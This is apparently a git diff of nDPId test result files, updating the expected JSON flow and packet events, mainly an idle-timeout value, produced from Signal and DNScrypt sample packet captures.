-00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1569051264090,"flow_last_seen":1569051264669,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3875,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57023,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"}} -00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1569051264091,"flow_last_seen":1569051264679,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4093,"flow_avg_l4_payload_len":157,"midstream":0,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57024,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"}} -00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1569051264093,"flow_last_seen":1569051264674,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3832,"flow_avg_l4_payload_len":147,"midstream":0,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57025,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"}} -00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":38,"flow_first_seen":1569051264666,"flow_last_seen":1569051265237,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":17722,"flow_avg_l4_payload_len":466,"midstream":0,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57026,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"}} -00634{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1569051257169,"flow_last_seen":1569051257194,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":5,"midstream":1,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"2.18.232.118","src_port":57017,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1569051257169,"flow_last_seen":1569051257194,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":5,"midstream":1,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"2.18.232.118","src_port":57017,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00815{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1569051247594,"flow_last_seen":1569051257495,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3653,"flow_avg_l4_payload_len":152,"midstream":0,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":49226,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"}} -00814{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1569051264073,"flow_last_seen":1569051267100,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4493,"flow_avg_l4_payload_len":179,"midstream":0,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":49227,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"}} -00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":265,"flow_first_seen":1569051267121,"flow_last_seen":1569051267601,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":198733,"flow_avg_l4_payload_len":749,"midstream":0,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"13.35.253.42","src_port":57027,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"}} +00636{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1569051266396,"flow_last_seen":1569051267048,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":111,"flow_avg_l4_payload_len":9,"midstream":1,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"23.57.24.16","dst_ip":"192.168.2.17","src_port":443,"dst_port":57016,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00579{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1569051266396,"flow_last_seen":1569051267048,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":111,"flow_avg_l4_payload_len":9,"midstream":1,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"23.57.24.16","dst_ip":"192.168.2.17","src_port":443,"dst_port":57016,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00687{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":45,"flow_first_seen":1569051247599,"flow_last_seen":1569051247843,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":11628,"flow_avg_l4_payload_len":258,"midstream":0,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"23.57.24.16","src_port":57018,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"}} +00688{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":45,"flow_first_seen":1569051264078,"flow_last_seen":1569051264482,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":12235,"flow_avg_l4_payload_len":271,"midstream":0,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"23.57.24.16","src_port":57022,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"}} +00679{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1569051247600,"flow_last_seen":1569051261087,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3832,"flow_avg_l4_payload_len":141,"midstream":0,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57019,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"}} +00679{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1569051247601,"flow_last_seen":1569051261087,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3875,"flow_avg_l4_payload_len":143,"midstream":0,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57020,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"}} +00679{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1569051247603,"flow_last_seen":1569051261087,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4093,"flow_avg_l4_payload_len":157,"midstream":0,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57021,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1569051264090,"flow_last_seen":1569051264669,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3875,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57023,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1569051264091,"flow_last_seen":1569051264679,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4093,"flow_avg_l4_payload_len":157,"midstream":0,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57024,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1569051264093,"flow_last_seen":1569051264674,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3832,"flow_avg_l4_payload_len":147,"midstream":0,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57025,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"}} +00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":38,"flow_first_seen":1569051264666,"flow_last_seen":1569051265237,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":17722,"flow_avg_l4_payload_len":466,"midstream":0,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57026,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"}} +00634{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1569051257169,"flow_last_seen":1569051257194,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":5,"midstream":1,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"2.18.232.118","src_port":57017,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1569051257169,"flow_last_seen":1569051257194,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":23,"flow_tot_l4_payload_len":46,"flow_avg_l4_payload_len":5,"midstream":1,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"2.18.232.118","src_port":57017,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00815{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1569051247594,"flow_last_seen":1569051257495,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3653,"flow_avg_l4_payload_len":152,"midstream":0,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":49226,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"}} +00814{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1569051264073,"flow_last_seen":1569051267100,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4493,"flow_avg_l4_payload_len":179,"midstream":0,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":49227,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"}} +00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":265,"flow_first_seen":1569051267121,"flow_last_seen":1569051267601,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":198733,"flow_avg_l4_payload_len":749,"midstream":0,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"13.35.253.42","src_port":57027,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"}} 00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569051264088,"flow_last_seen":1569051264113,"flow_idle_time":180000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":151,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":56263,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Signal","breed":"Fun","category":"Chat"}} 00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1569051247593,"flow_last_seen":1569051247630,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1569051267601,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":60793,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00562{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":637,"source":"signal.pcap","alias":"nDPId-test","packets-captured":637,"packets-processed":637,"total-skipped-flows":0,"total-l4-data-len":273842,"total-not-detected-flows":0,"total-guessed-flows":3,"total-detected-flows":16,"total-detection-updates":24,"total-updates":0,"current-active-flows":0,"total-active-flows":19,"total-idle-flows":19,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":137,"global_ts_msec":1569051267601} diff --git a/test/results/simple-dnscrypt.pcap.out b/test/results/simple-dnscrypt.pcap.out index 34fa8e2b2..747274cc8 100644 --- a/test/results/simple-dnscrypt.pcap.out +++ b/test/results/simple-dnscrypt.pcap.out @@ -1,37 +1,37 @@ 00466{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00552{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1491813284555} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1491813284555,"flow_last_seen":1491813284555,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1491813284555,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50233,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1491813284555,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1491813284555,"pkt":"uFpz9d6dpDTZFrEGCABFAAA0PRVAAIAGMNDAqCunhncaGMQ5Abvf\/XrjAAAAAIACIAChWwAAAgQFtAEDAwgBAQQC"} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1491813284666,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1491813284666,"pkt":"pDTZFrEGuFpz9d6dCABFAAA0AABAADMGuuWGdxoYwKgrpwG7xDnBW87r3\/165IASchC\/iQAAAgQFHgEBBAIBAwMH"} -00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1491813284666,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1491813284666,"pkt":"uFpz9d6dpDTZFrEGCABFAAAoPRZAAIAGMNvAqCunhncaGMQ5Abvf\/XrkwVvO7FAQAEBxlgAA"} -00845{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1491813284555,"flow_last_seen":1491813284694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1491813284694,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50233,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"simplednscrypt.org","ja3":"b8f81673c0e1d29908346f3bab892b9b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00902{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1491813284555,"flow_last_seen":1491813284804,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":1516,"flow_avg_l4_payload_len":252,"midstream":0,"thread_ts_msec":1491813284804,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50233,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"simplednscrypt.org","ja3":"b8f81673c0e1d29908346f3bab892b9b","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01256{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":11,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1491813284555,"flow_last_seen":1491813284819,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":6756,"flow_avg_l4_payload_len":614,"midstream":0,"thread_ts_msec":1491813284819,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50233,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"simplednscrypt.org","server_names":"simplednscrypt.org,www.simplednscrypt.org","ja3":"b8f81673c0e1d29908346f3bab892b9b","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Domain Validation Secure Server CA","subjectDN":"OU=Domain Control Validated, OU=PositiveSSL, CN=simplednscrypt.org","alpn":"h2,http\/1.1","fingerprint":"3E:20:0F:BF:AD:D8:5C:A1:A1:1B:E5:B2:A7:D4:68:E2:6A:DB:01:41"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":40,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1491813286275,"flow_last_seen":1491813286275,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1491813286275,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50253,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":40,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1491813286275,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1491813286275,"pkt":"uFpz9d6dpDTZFrEGCABFAAA0PSdAAIAGML7AqCunhncaGMRNAbtYb9jbAAAAAIACIADK3QAAAgQFtAEDAwgBAQQC"} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":41,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1491813286392,"flow_last_seen":1491813286392,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1491813286392,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50258,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1491813286392,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1491813286392,"pkt":"uFpz9d6dpDTZFrEGCABFAAA0PShAAIAGML3AqCunhncaGMRSAbte7A6DAAAAAIACIACOtAAAAgQFtAEDAwgBAQQC"} 